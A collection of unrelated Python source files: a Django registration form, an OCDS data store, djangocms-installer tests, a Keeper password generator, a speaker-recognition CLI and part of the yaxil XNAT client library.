return sklearn.metrics.average_precision_score(np.ravel(adj_true) > 0, np.ravel(adj_test))
|
<filename>bosm2015/registration/forms.py<gh_stars>1-10
from registration.models import UserProfile
from django.contrib.auth.models import User
from nocaptcha_recaptcha.fields import NoReCaptchaField
from django import forms
cities= (
('Alwar','Alwar'),
('Bahadurgarh','Bahadurgarh'),
('Bangalore','Bangalore'),
('Bareilly','Bareilly'),
('Bellary','Bellary'),
('Berhampur','Berhampur'),
('Bahadurgarh','Bahadurgarh'),
('Bhilai','Bhilai'),
('Bhiwani','Bhiwani'),
('Bhopal','Bhopal'),
('Bhubaneswar','Bhubaneswar'),
('Bikaner','Bikaner'),
('Bilaspur','Bilaspur'),
('Chandigarh','Chandigarh'),
('Chennai','Chennai'),
('Chirawa','Chirawa'),
('Chitoor','Chitoor'),
('Chittorgarh','Chittorgarh'),
('Cochin','Cochin'),
('Coimbatore','Coimbatore'),
('Dehradun','Dehradun'),
('Deogarh','Deogarh'),
('Dindigul','Dindigul'),
('Faridabad','Faridabad'),
('Faridkot','Faridkot'),
('Gandhinagar','Gandhinagar'),
('Ghaziabad','Ghaziabad'),
('Goa','Goa'),
('Guna','Guna'),
('Guntur','Guntur'),
('Gurgaon','Gurgaon'),
('Gwalior','Gwalior'),
('Hamirpur','Hamirpur'),
('Hissar','Hissar'),
('Hyderabad','Hyderabad'),
('Indore','Indore'),
('Jaipur','Jaipur'),
('Jammu','Jammu'),
('Jhajjar','Jhajjar'),
('Jhalawar','Jhalawar'),
('Jhansi','Jhansi'),
('Jhunjhunu','Jhunjhunu'),
('Jodhpur','Jodhpur'),
('Kannur','Kannur'),
('Kanpur','Kanpur'),
('Kharagpur','Kharagpur'),
('Kolkata','Kolkata'),
('Kota','Kota'),
('Kurukshetra','Kurukshetra'),
('Lakshmangarh','Lakshmangarh'),
('Latur','Latur'),
('Lucknow','Lucknow'),
('Madurai','Madurai'),
('Mandi','Mandi'),
('Mathura','Mathura'),
('Meerut','Meerut'),
('Mohali','Mohali'),
('Moradabad','Moradabad'),
('Mumbai','Mumbai'),
('Nagpur','Nagpur'),
('Narasaraopet','Narasaraopet'),
('Nashik','Nashik'),
('Neemrana','Neemrana'),
('Nellore','Nellore'),
('New Delhi','New Delhi'),
('Noida','Noida'),
('Panipat','Panipat'),
('Patiala','Patiala'),
('Patna','Patna'),
('Pilani','Pilani'),
('Pondicherry','Pondicherry'),
('Pune','Pune'),
('Rohtak','Rohtak'),
('Roorkee','Roorkee'),
('Rupnagar','Rupnagar'),
('Sadopur','Sadopur'),
('Saharanpur','Saharanpur'),
('Salem','Salem'),
('Sambalpur','Sambalpur'),
('Sangur','Sangur'),
('Sarang','Sarang'),
('Shimla','Shimla'),
('Sikar','Sikar'),
('Sonepat','Sonepat'),
('Srikakulam','Srikakulam'),
('Srinagar','Srinagar'),
('Surathkal','Surathkal'),
('Tiruchengode','Tiruchengode'),
('Thiruvananthapuram','Thiruvananthapuram'),
('Udaipur','Udaipur'),
('Ujjain','Ujjain'),
('Vadodara','Vadodara'),
('Varanasi','Varanasi'),
('Vellore','Vellore'),
('Vijayawada','Vijayawada'),
('Vilani','Vilani'),
('Villupuram','Villupuram'),
('Vishakapatnam','Vishakapatnam'),
('Vizag','Vizag'),
('Warangal','Warangal'),
('Other','Other'),
)
class UserForm(forms.ModelForm):
class Meta:
model = User
fields = ('username', 'email', 'password')
widgets = {
'password': forms.PasswordInput(),
}
class UserProfileForm(forms.ModelForm):
phone = forms.RegexField(regex=r'^\d{10}$', error_message = ("Enter a valid 10 digit mobile number!"))
captcha = NoReCaptchaField()
class Meta:
model = UserProfile
fields = ('firstname', 'lastname', 'college','city','phone')
widgets = {
'city': forms.Select(choices=cities),
} |
import json
from ocdskingfisher.database import DatabaseStore
class Store:
def __init__(self, config, database):
self.config = config
self.collection_id = None
self.database = database
def load_collection(self, collection_source, collection_data_version, collection_sample):
self.collection_id = self.database.get_or_create_collection_id(collection_source, collection_data_version, collection_sample)
def store_file_from_local(self, filename, url, data_type, encoding, local_filename):
if data_type == 'release_package_json_lines' or data_type == 'record_package_json_lines':
try:
with open(local_filename, encoding=encoding) as f:
number = 0
raw_data = f.readline()
while raw_data:
self.store_file_item(filename, url, data_type, json.loads(raw_data), number)
raw_data = f.readline()
number += 1
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
else:
try:
with open(local_filename, encoding=encoding) as f:
data = json.load(f)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
objects_list = []
if data_type == 'record_package_list_in_results':
objects_list.extend(data['results'])
elif data_type == 'release_package_list_in_results':
objects_list.extend(data['results'])
elif data_type == 'record_package_list' or data_type == 'release_package_list':
objects_list.extend(data)
else:
objects_list.append(data)
number = 0
for item_data in objects_list:
try:
self.store_file_item(filename, url, data_type, item_data, number)
number += 1
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
self.database.mark_collection_file_store_done(self.collection_id, filename)
def store_file_item_from_local(self, filename, url, data_type, encoding, number, local_filename):
try:
with open(local_filename, encoding=encoding) as f:
data = json.load(f)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
try:
self.store_file_item(filename, url, data_type, data, number)
except Exception as e:
raise e
# TODO Store error in database and make nice HTTP response!
def store_file_item(self, filename, url, data_type, json_data, number):
if not isinstance(json_data, dict):
raise Exception("Can not process data as JSON is not an object")
with DatabaseStore(database=self.database, collection_id=self.collection_id, file_name=filename, number=number) as store:
if data_type == 'release' or data_type == 'record':
data_list = [json_data]
elif data_type == 'release_package' or \
data_type == 'release_package_json_lines' or \
data_type == 'release_package_list_in_results' or \
data_type == 'release_package_list':
if 'releases' not in json_data:
if data_type == 'release_package_json_lines' and \
self.ignore_release_package_json_lines_missing_releases_error:
return
raise Exception("Release list not found")
elif not isinstance(json_data['releases'], list):
raise Exception("Release list which is not a list found")
data_list = json_data['releases']
elif data_type == 'record_package' or \
data_type == 'record_package_json_lines' or \
data_type == 'record_package_list_in_results' or \
data_type == 'record_package_list':
if 'records' not in json_data:
raise Exception("Record list not found")
elif not isinstance(json_data['records'], list):
raise Exception("Record list which is not a list found")
data_list = json_data['records']
else:
raise Exception("data_type not a known type")
package_data = {}
if not data_type == 'release':
for key, value in json_data.items():
if key not in ('releases', 'records'):
package_data[key] = value
for row in data_list:
if not isinstance(row, dict):
raise Exception("Row in data is not a object")
if data_type == 'record' or \
data_type == 'record_package' or \
data_type == 'record_package_json_lines' or \
data_type == 'record_package_list_in_results' or \
data_type == 'record_package_list':
store.insert_record(row, package_data)
else:
store.insert_release(row, package_data)
|
<filename>env/lib/python2.7/site-packages/tests/main.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
from subprocess import CalledProcessError
from mock import patch
from djangocms_installer import config, install, main
from .base import IsolatedTestClass, dj_ver, unittest
class TestMain(IsolatedTestClass):
def test_requirements_invocation(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
'-len', '--cms-version=stable', '-R',
'-q', '-u', '-p'+self.project_dir,
'example_prj']
main.execute()
stdout = self.stdout.getvalue()
self.assertTrue(stdout.find('Django<1.8') > -1)
self.assertTrue(stdout.find('django-reversion>=1.8') > -1)
self.assertTrue(stdout.find('djangocms-text-ckeditor') > -1)
self.assertTrue(stdout.find('djangocms-admin-style') > -1)
self.assertTrue(stdout.find('djangocms-column') > -1)
self.assertTrue(stdout.find('djangocms-file') > -1)
self.assertTrue(stdout.find('djangocms-flash') > -1)
self.assertTrue(stdout.find('djangocms-googlemap') > -1)
self.assertTrue(stdout.find('djangocms-inherit') > -1)
self.assertTrue(stdout.find('djangocms-link') > -1)
self.assertTrue(stdout.find('djangocms-picture') > -1)
self.assertTrue(stdout.find('djangocms-style') > -1)
self.assertTrue(stdout.find('djangocms-teaser') > -1)
self.assertTrue(stdout.find('djangocms-video') > -1)
def cleanup_ask(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
conf_data = config.parse([
'-q',
'--db=postgres://user:pwd@host/dbname',
'--i18n=no',
'--cms-version=2.4',
'--django-version=1.7',
'-f',
'-p'+self.project_dir,
'example_prj'])
install.cleanup_directory(conf_data)
self.assertFalse(os.path.exists(self.project_dir))
def test_main_invocation(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
'-len', '--cms-version=stable', '--django=%s' % dj_ver,
'-q', '-u', '-p'+self.project_dir,
'example_prj']
main.execute()
self.assertTrue(os.path.exists(os.path.join(self.project_dir, 'static')))
self.assertTrue(os.path.exists(os.path.join(self.project_dir, 'requirements.txt')))
self.assertTrue(os.path.exists(os.path.join(self.project_dir, 'example_prj', 'static')))
with open(os.path.join(self.project_dir, 'requirements.txt'), 'r') as req_file:
text = req_file.read()
self.assertTrue(text.find('djangocms-text-ckeditor') > -1)
# Checking we successfully completed the whole process
self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())
def test_two_langs_invocation(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
'-len', '-lfr', '--cms-version=stable', '--django=%s' % dj_ver,
'-q', '-u', '-p'+self.project_dir,
'example_prj']
main.execute()
# Checking we successfully completed the whole process
self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())
def test_develop(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
'-len', '--cms-version=develop', '--django=%s' % dj_ver,
'-q', '-u', '-p'+self.project_dir,
'example_prj']
main.execute()
# Checking we successfully completed the whole process
self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())
def test_cleanup(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
with self.assertRaises((CalledProcessError, EnvironmentError)):
sys.argv = ['main'] + ['--db=postgres://user:pwd@host/dbname',
'-len', '--no-db-driver',
'-q', '-u', '-p'+self.project_dir,
'example_prj']
main.execute()
self.assertFalse(os.path.exists(self.project_dir))
@unittest.skipIf(sys.version_info >= (3, 0),
reason='django 1.4 does not support python3')
def test_django_1_4(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
'-len', '--django-version=1.4',
'--cms-version=3.0',
'-q', '-u', '-p'+self.project_dir,
'example_prj']
main.execute()
# Checking we successfully completed the whole process
self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())
@unittest.skipIf(sys.version_info >= (3, 0),
reason='django 1.5 does not support python3')
def test_django_1_5(self):
with patch('sys.stdout', self.stdout):
with patch('sys.stderr', self.stderr):
sys.argv = ['main'] + ['--db=sqlite://localhost/test.db',
'-len', '--django-version=1.5',
'--cms-version=3.0',
'-q', '-u', '-p'+self.project_dir,
'example_prj']
main.execute()
# Checking we successfully completed the whole process
self.assertTrue(('Get into "%s" directory and type "python manage.py runserver" to start your project' % self.project_dir) in self.stdout.getvalue())
|
<gh_stars>0
# _ __
# | |/ /___ ___ _ __ ___ _ _ ®
# | ' </ -_) -_) '_ \/ -_) '_|
# |_|\_\___\___| .__/\___|_|
# |_|
#
# <NAME>
# Contact: <EMAIL>
#
import logging
import os
import random
import string
from secrets import choice
from Cryptodome.Random.random import shuffle
PW_SPECIAL_CHARACTERS = '!@#$%()+;<>=?[]{}^.,'
def randomSample(sampleLength=0, sampleString=''):
sample = ''
use_secrets = False
try:
# Older version of Python (before 3.6) don't have this module.
# If not installed, fall back to the original version of the code
import secrets
logging.debug("module 'secrets' is installed")
use_secrets = True
except ModuleNotFoundError:
logging.warning("module 'secrets' is not installed")
for i in range(sampleLength):
if use_secrets:
sample += secrets.choice(sampleString)
else:
pos = int.from_bytes(os.urandom(2), 'big') % len(sampleString)
sample += sampleString[pos]
return sample
def rules(uppercase=0, lowercase=0, digits=0, special_characters=0):
""" Generate a password of specified length with specified number of """
""" uppercase, lowercase, digits and special characters """
password = ''
if uppercase:
password += randomSample(uppercase, string.ascii_uppercase)
if lowercase:
password += randomSample(lowercase, string.ascii_lowercase)
if digits:
password += randomSample(digits, string.digits)
if special_characters:
password += randomSample(special_characters, string.punctuation)
newpass = ''.join(random.sample(password,len(password)))
return newpass
def generateFromRules(rulestring):
""" Generate based on rules from a string similar to "4,5,2,5" """
uppercase, lowercase, digits, special = 0,0,0,0
ruleparams = filter(str.isdigit, rulestring)
rulecount = 0
for rule in ruleparams:
if rulecount == 0:
uppercase = int(rule)
elif rulecount == 1:
lowercase = int(rule)
elif rulecount == 2:
digits = int(rule)
elif rulecount == 3:
special = int(rule)
rulecount += 1
return rules(uppercase, lowercase, digits, special)
def generate(length=64):
""" Generate password of specified len """
increment = length // 4
lastincrement = increment + (length % 4)
return rules(increment, increment, increment, lastincrement)
class KeeperPasswordGenerator:
def __init__(self, length: int, symbols: int, digits: int, caps: int, lower: int):
sum_categories = sum(
(symbols if symbols > 0 else 0, digits if digits > 0 else 0, caps if caps > 0 else 0, lower if lower > 0 else 0)
)
if sum_categories == 0:
symbols, digits, caps, lower, sum_categories = 1, 1, 1, 1, 4
extra_count = length - sum_categories if length > sum_categories else 0
self.category_map = [
(symbols, PW_SPECIAL_CHARACTERS),
(digits, string.digits),
(caps, string.ascii_uppercase),
(lower, string.ascii_lowercase),
]
extra_chars = ''.join(c[1] for c in self.category_map if c[0] > 0)
self.category_map.append((extra_count, extra_chars))
def generate(self) -> str:
password_list = []
for count, chars in self.category_map:
password_list.extend(choice(chars) for i in range(count))
shuffle(password_list)
return ''.join(password_list)
|
#!/usr/bin/env python3
import os
import sys
import itertools
import glob
import argparse
from utils import read_wav
from interface import ModelInterface
def get_args():
desc = "Speaker Recognition Command Line Tool"
epilog = """
Wav files in each input directory will be labeled as the basename of the directory.
Note that wildcard inputs should be *quoted*, and they will be sent to glob.glob module.
Examples:
Train (enroll a list of person named person*, and mary, with wav files under corresponding directories):
./speaker-recognition.py -t enroll -i "/tmp/person* ./mary" -m model.out
python ./speaker-recognition.py -t enroll -i "./datatrain/hang/ datatrain/hoai/ datatrain/huong/ datatrain/nhung/ datatrain/tuananh datatrain/murray datatrain/jenny" -m model.out
Predict (predict the speaker of all wav files):
./speaker-recognition.py -t predict -i "./*.wav" -m model.out
python ./speaker-recognition.py -t predict -i "datatest/*.wav" -m model.out
"""
parser = argparse.ArgumentParser(description=desc,epilog=epilog,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('-t', '--task',
help='Task to do. Either "enroll" or "predict"',
required=False)
parser.add_argument('-i', '--input',
help='Input Files(to predict) or Directories(to enroll)',
required=False)
parser.add_argument('-m', '--model',
help='Model file to save(in enroll) or use(in predict)',
required=False)
ret = parser.parse_args()
return ret
def task_enroll(input_dirs, output_model):
m = ModelInterface()
input_dirs = [os.path.expanduser(k) for k in input_dirs.strip().split()]
dirs = itertools.chain(*(glob.glob(d) for d in input_dirs))
dirs = [d for d in dirs if os.path.isdir(d)]
files = []
if len(dirs) == 0:
print ("No valid directory found!")
sys.exit(1)
for d in dirs:
label = os.path.basename(d.rstrip('/'))
wavs = glob.glob(d + '/*.wav')
if len(wavs) == 0:
print ("No wav file found in %s"%(d))
continue
for wav in wavs:
try:
fs, signal = read_wav(wav)
m.enroll(label, fs, signal)
print("wav %s has been enrolled"%(wav))
except Exception as e:
print(wav + " error %s"%(e))
m.train()
m.dump(output_model)
# def task_predict(input_files, input_model):
# m = ModelInterface.load(input_model)
# for f in glob.glob(os.path.expanduser(input_files)):
# fs, signal = read_wav(f)
# label, score = m.predict(fs, signal)
# print (f, '->', label, ", score->", score)
def task_predict(path, input_model):
m = ModelInterface.load(input_model)
files = []
sum,true = 0,0
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for file in f:
if '.wav' in file:
files.append(os.path.join(r, file))
for f in files:
sum+=1
fs, signal = read_wav(f)
label, score = m.predict(fs, signal)
strPath = os.path.realpath(f)
y_true = os.path.basename(os.path.dirname(strPath))
if (label==y_true):
true+=1
print (f, '->', label, ", score->", score)
print('So file du doan dung: ',true)
print('Tong so file: ', sum)
print('accuracy: ',true/sum*100,'%')
def Predict_ByFile(file,input_model):
print("start")
m = ModelInterface.load(input_model)
fs, signal = read_wav(file)
print(fs)
print(signal)
label, score = m.predict(fs, signal)
strPath = os.path.realpath(file)
y_true = os.path.basename(os.path.dirname(strPath))
print(label)
print(score)
return label
def OrderEnroll():
m=ModelInterface.load("model.out")
fs, signal = read_wav("./GUI/TotalRecording/18082020202755.wav")
m.enroll("18082020202755", fs, signal)
m.train()
m.CheckEnroll()
m.dump("mo1.out")
# def task_predictgui(path, input_model):
# m = ModelInterface.load(input_model)
# f=glob.glob(path)
# fs, signal = read_wav(f[0])
# label, score = m.predict(fs, signal)
# return label
#
# if __name__ == "__main__":
# # global args
# # args = get_args()
# #
# # task = args.task
# #
# # if task == 'enroll':
# # task_enroll(args.input, args.model)
# #
# #
# # elif task == 'predict':
# # task_predict(args.input, args.model)
# # task_predict("datatest/*.wav", "model1.out")
# task_enroll("./Train/*","model.out")
#
# # task_predict("./Test", "model.out")
# Predict_ByFile("./GUI/TotalRecording/18082020202755.wav", "D:/doantotnghiep/Speaker_recognition/model.out")
# OrderEnroll() |
<filename>yaxil/__init__.py
import io
import os
import csv
import sys
import gzip
import json
import time
import arrow
import random
import sqlite3
import zipfile
import logging
import requests
from requests_toolbelt.adapters.socket_options import TCPKeepAliveAdapter
import itertools
import getpass as gp
import tempfile as tf
import subprocess as sp
import collections as col
from argparse import Namespace
from contextlib import contextmanager
import xml.etree.ElementTree as etree
import yaxil.commons as commons
import yaxil.functools as functools
from .session import Session
from .exceptions import (AuthError, MultipleAccessionError, NoAccessionError,
AccessionError, DownloadError, ResultSetError,
ScanSearchError, EQCNotFoundError, RestApiError,
AutoboxError, NoExperimentsError, NoSubjectsError,
CommandNotFoundError)
# Whether to verify SSL certificates. Primarily of use during testing.
CHECK_CERTIFICATE = True
logger = logging.getLogger(__name__)
logging.getLogger("requests").setLevel(logging.WARNING)
class Format(object):
'''
A container to hold possible XNAT response formats: Format.JSON,
Format.XML, and Format.CSV.
'''
JSON = "json"
XML = "xml"
CSV = "csv"
XnatAuth = col.namedtuple("XnatAuth", [
"url",
"username",
"password"
])
'''
Container to hold XNAT authentication information. Fields include the ``url``,
``username``, and ``password``.
'''
def test_auth(auth):
'''
Validate auth input against XNAT.
'''
url = '{0}/data/version'.format(auth.url.rstrip('/'))
r = requests.get(url, auth=basicauth(auth))
if r.status_code == requests.codes.UNAUTHORIZED:
return False
return True
def basicauth(auth):
'''
Create basic auth tuple for requests.
'''
if auth.username and auth.password:
return (auth.username, auth.password)
return None
@contextmanager
def session(auth):
'''
Create a session context to avoid explicitly passing authentication to
every function.
Example:
.. code-block:: python
import yaxil
auth = yaxil.XnatAuth(url='...', username='...', password='...')
with yaxil.session(auth) as sess:
aid = sess.accession('AB1234C')
experiment = sess.experiment('AB1234C')
sess.download('AB1234C', [1,3,14], out_dir='./dicomz')
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:returns: YAXIL session object
:rtype: :mod:`yaxil.session.Session`
'''
sess = Session(auth)
yield sess
def auth2(alias=None, host=None, username=None, password=None, cfg='~/.xnat_auth'):
result = tuple()
# First, look for authentication data in ~/.xnat_auth
if alias:
logger.debug('returning authentication data from %s', cfg)
return auth(alias)
# Second, look for authentication data from --host, --user, --password function arguments
authargs = (host, username)
if any(authargs):
if not all(authargs):
raise AuthError('you must supply --host, --username and --password (or password prompt)')
logger.debug('returning authentication data from command line')
if not password:
password = <PASSWORD>('Enter XNAT passphrase:')
return XnatAuth(url=host, username=username, password=password)
# Third, look for authentication data in environment variables
host = os.environ.get('XNAT_HOST', None)
username = os.environ.get('XNAT_USER', None)
password = os.environ.get('XNAT_PASS', None)
authargs = (host, username)
if any(authargs):
if not all(authargs):
raise AuthError('you must set $XNAT_HOST, $XNAT_USER, and $XNAT_PASS (or password prompt)')
logger.debug('returning authentication data from environment variables')
if not password:
password = <PASSWORD>('Enter XNAT passphrase:')
return XnatAuth(url=host, username=username, password=password)
raise AuthError('you must provide authentication data using xnat_auth, command line, or environment variables')
def auth(alias=None, url=None, cfg="~/.xnat_auth"):
'''
Read connection details from an xnat_auth XML file
Example:
>>> import yaxil
>>> auth = yaxil.auth('xnatastic')
>>> auth.url, auth.username, auth.password
('https://www.xnatastic.org/', 'username', '********')
:param alias: XNAT alias
:type alias: str
:param url: XNAT URL
:type url: str
:param cfg: Configuration file
:type cfg: str
:returns: Named tuple of (url, username, password)
:rtype: :mod:`yaxil.XnatAuth`
'''
if not alias and not url:
raise ValueError('you must provide an alias or url argument')
if alias and url:
raise ValueError('cannot provide both alias and url arguments')
# check and parse config file
cfg = os.path.expanduser(cfg)
if not os.path.exists(cfg):
raise AuthError("could not locate auth file %s" % cfg)
tree = etree.parse(os.path.expanduser(cfg))
# search by alias or url
res = None
if alias:
res = tree.findall("./%s" % alias)
if url:
res = tree.findall("./*/[url='%s']" % url)
if not res:
raise AuthError("failed to locate xnat credentials within %s" % cfg)
elif len(res) > 1:
raise AuthError("found too many sets of credentials within %s" % cfg)
res = res.pop()
# get url
url = res.findall("url")
if not url:
raise AuthError("no url for %s in %s" % (alias, cfg))
elif len(url) > 1:
raise AuthError("too many urls for %s in %s" % (alias, cfg))
# get username
username = res.findall("username")
if not username:
raise AuthError("no username for %s in %s" % (alias, cfg))
elif len(username) > 1:
raise AuthError("too many usernames for %s in %s" % (alias, cfg))
# get password
password = res.findall("password")
if not password:
password = <PASSWORD>pass('Enter XNAT passphrase:')
elif len(password) > 1:
raise AuthError("too many passwords for %s in %s" % (alias, cfg))
else:
password = password.pop().text
return XnatAuth(
url=url.pop().text,
username=username.pop().text,
password=password
)
Subject = col.namedtuple('Subject', [
'uri',
'label',
'id',
'project'
])
'''
Container to hold XNAT Subject information. Fields include the Subject URI
(``uri``), Accession ID (``id``), Project (``project``), and Label (``label``).
'''
def subjects(auth, label=None, project=None):
'''
Retrieve Subject tuples for subjects returned by this function.
Example:
>>> import yaxil
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> yaxil.subjects(auth, 'AB1234C')
Subject(uri=u'/data/experiments/XNAT_S0001', label=u'AB1234C', id=u'XNAT_S0001',
project=u'MyProject')
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param label: XNAT Subject label
:type label: str
:param project: XNAT Subject Project
:type project: str
:returns: Subject objects
:rtype: :mod:`yaxil.Subject`
'''
url = '{0}/data/subjects'.format(auth.url.rstrip('/'))
logger.debug('issuing http request %s', url)
# compile query string
columns = [
'ID',
'label',
'project'
]
payload = {
'columns': ','.join(columns)
}
if label:
payload['label'] = label
if project:
payload['project'] = project
# submit the request
r = requests.get(url, params=payload, auth=basicauth(auth),
verify=CHECK_CERTIFICATE)
# validate response
if r.status_code != requests.codes.ok:
raise AccessionError('response not ok ({0}) from {1}'.format(r.status_code, r.url))
try:
results = r.json()
__quick_validate(results)
except ResultSetError as e:
raise ResultSetError('{0} from {1}'.format(e.message, r.url))
results = results['ResultSet']
if int(results['totalRecords']) == 0:
raise NoSubjectsError('no records returned from {0}'.format(r.url))
# start generating consumable results for the caller
for item in results['Result']:
yield Subject(uri=item['URI'],
id=item['ID'],
project=item['project'],
label=item['label'])
Experiment = col.namedtuple('Experiment', [
'uri',
'label',
'id',
'project',
'subject_id',
'subject_label',
'archived_date'
])
'''
Container to hold XNAT Experiment information. Fields include the Experiment URI
(``uri``), Accession ID (``id``), Project (``project``), Label (``label``),
Subject Accession ID (``subject_id``), Subject label (``subject_label``), and
archived date (``archived_date``).
'''
def experiments(auth, label=None, project=None, subject=None, daterange=None):
'''
Retrieve Experiment tuples for experiments returned by this function.
Example:
>>> import yaxil
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> yaxil.experiment(auth, 'AB1234C')
Experiment(uri=u'/data/experiments/XNAT_E0001', label=u'AB1234C', id=u'XNAT_E0001',
project=u'MyProject', subject_id=u'XNAT_S0001', subject_label='ABC')
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param label: XNAT Experiment label
:type label: str
:param project: XNAT Experiment Project
:type project: str
:param subject: YAXIL Subject
:type subject: :mod:`yaxil.Subject`
:param daterange: Start and end dates
:type daterange: tuple
:returns: Experiment object
:rtype: :mod:`yaxil.Experiment`
'''
if subject and (label or project):
raise ValueError('cannot provide subject with label or project')
url = '{0}/data/experiments'.format(auth.url.rstrip('/'))
logger.debug('issuing http request %s', url)
# compile query string
columns = [
'ID',
'label',
'project',
'xnat:subjectassessordata/subject_id',
'subject_label',
'insert_date'
]
payload = {
'columns': ','.join(columns)
}
if label:
payload['label'] = label
if project:
payload['project'] = project
if subject:
payload['project'] = subject.project
payload['xnat:subjectassessordata/subject_id'] = subject.id
if daterange:
start = arrow.get(daterange[0]).format('MM/DD/YYYY')
stop = arrow.get(daterange[1]).format('MM/DD/YYYY')
payload['date'] = '{0}-{1}'.format(start, stop)
# submit request
r = requests.get(url, params=payload, auth=basicauth(auth), verify=CHECK_CERTIFICATE)
# validate response
if r.status_code != requests.codes.ok:
raise AccessionError('response not ok ({0}) from {1}'.format(r.status_code, r.url))
try:
results = r.json()
__quick_validate(results)
except ResultSetError as e:
raise ResultSetError('{0} from {1}'.format(e.message, r.url))
results = results['ResultSet']
if int(results['totalRecords']) == 0:
raise NoExperimentsError('no records returned for {0}'.format(r.url))
for item in results['Result']:
yield Experiment(uri=item['URI'],
id=item['ID'],
project=item['project'],
label=item['label'],
subject_id=item['subject_ID'],
subject_label=item['subject_label'],
archived_date=item['insert_date'])
@functools.lru_cache
def accession(auth, label, project=None):
'''
Get the Accession ID for any Experiment label.
Example:
>>> import yaxil
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> yaxil.accession(auth, 'AB1234C')
u'XNAT_E00001'
:param auth: XNAT authentication
:type auth: :mod:`yaxil.XnatAuth`
:param label: XNAT Experiment label
:type label: str
:param project: XNAT Experiment Project
:type project: str
:returns: Accession ID
:rtype: str
'''
expts = list(experiments(auth, label, project))
if len(expts) > 1:
raise MultipleAccessionError(f'label={label}, project={project}')
return expts[0].id
def download(auth, label, scan_ids=None, project=None, aid=None,
out_dir='.', in_mem=True, progress=False, attempts=1,
out_format='flat'):
'''
Download scan data from XNAT.
Example:
>>> import yaxil
>>> auth = yaxil.XnatAuth(url='...', username='...', password='...')
>>> yaxil.download(auth, 'AB1234C', ['1', '2'], out_dir='./data')
:param auth: XNAT authentication object
:type auth: :mod:`yaxil.XnatAuth`
:param label: XNAT MR Session label
:type label: str
:param scan_ids: Scan numbers to return; use None for all
:type scan_ids: list
:param project: XNAT MR Session project
:type project: str
:param aid: XNAT Accession ID
:type aid: str
:param out_dir: Output directory
:type out_dir: str
:param out_format: Extract all files or leave native structure
:type output_format: str
:param in_mem: Keep download content in memory; faster but uses more memory
:type in_mem: bool
:param progress: Show download progress every N bytes
:type progress: int
:param attempts: Number of download attempts
:type attempts: int
'''
if not scan_ids:
scan_ids = ['ALL']
if not aid:
aid = accession(auth, label, project)
# build the url
url = "%s/data/experiments/%s/scans/%s/files?format=zip" % (auth.url.rstrip('/'),
aid, ','.join([str(x) for x in scan_ids]))
# issue the http request, with exponential backoff retry behavior
backoff = 10
for _ in range(attempts):
logger.debug("issuing http request %s", url)
s = requests.Session()
keep_alive = TCPKeepAliveAdapter(idle=120, count=20, interval=30)
s.mount('https://', keep_alive)
r = s.get(url, stream=True,
auth=basicauth(auth), verify=CHECK_CERTIFICATE)
logger.debug("response headers %s", r.headers)
if r.status_code == requests.codes.ok:
break
fuzz = random.randint(0, 10)
logger.warning("download unsuccessful (%s), retrying in %s seconds", r.status_code,
backoff + fuzz)
time.sleep(backoff + fuzz)
backoff *= 2
# if we still have a not-ok status at this point, the download failed
if r.status_code != requests.codes.ok:
raise DownloadError("response not ok (%s) from %s" % (r.status_code, r.url))
# create output directory
if not os.path.exists(out_dir):
os.makedirs(out_dir)
# keep response content in memory or write to a file (memory is obviously faster, but limited)
if in_mem:
content = io.BytesIO()
logger.debug("response content will be read into memory")
else:
content = tf.NamedTemporaryFile(dir=out_dir, prefix="xnat", suffix=".zip")
logger.debug("response content will be stored on disk %s", content.name)
# progress indicator setup
if progress:
sys.stdout.write("reading response data: ")
sys.stdout.flush()
# read response content in chunks
meter = 0
chunk_size = 1024
for chunk in r.iter_content(chunk_size=chunk_size):
if progress and meter >= progress:
sys.stdout.write(next(commons.spinner)); sys.stdout.flush()
sys.stdout.write('\b')
meter = 0
content.write(chunk)
meter += chunk_size
# flush and fsync before moving on
content.flush()
try:
os.fsync(content.fileno())
except io.UnsupportedOperation:
pass
# progress indicator shut down
if progress:
sys.stdout.write('done.\n'); sys.stdout.flush()
# load reponse content into a zipfile object
try:
zf = zipfile.ZipFile(content, allowZip64=True)
except zipfile.BadZipfile:
with tf.NamedTemporaryFile(dir=out_dir, prefix="xnat",
suffix=".zip", delete=False) as fo:
content.seek(0)
fo.write(content.read())
fo.flush()
os.fsync(fo.fileno())
raise DownloadError("bad zip file, written to %s" % fo.name)
# finally extract the zipfile (with various nasty edge cases handled)
logger.debug("extracting zip archive to %s", out_dir)
if out_format == 'native':
zf.extractall(path=out_dir)
else: # out_format == 'flat' or out_format == '1.4'
extract(zf, content, out_dir)
def extract(zf, content, out_dir='.'):
'''
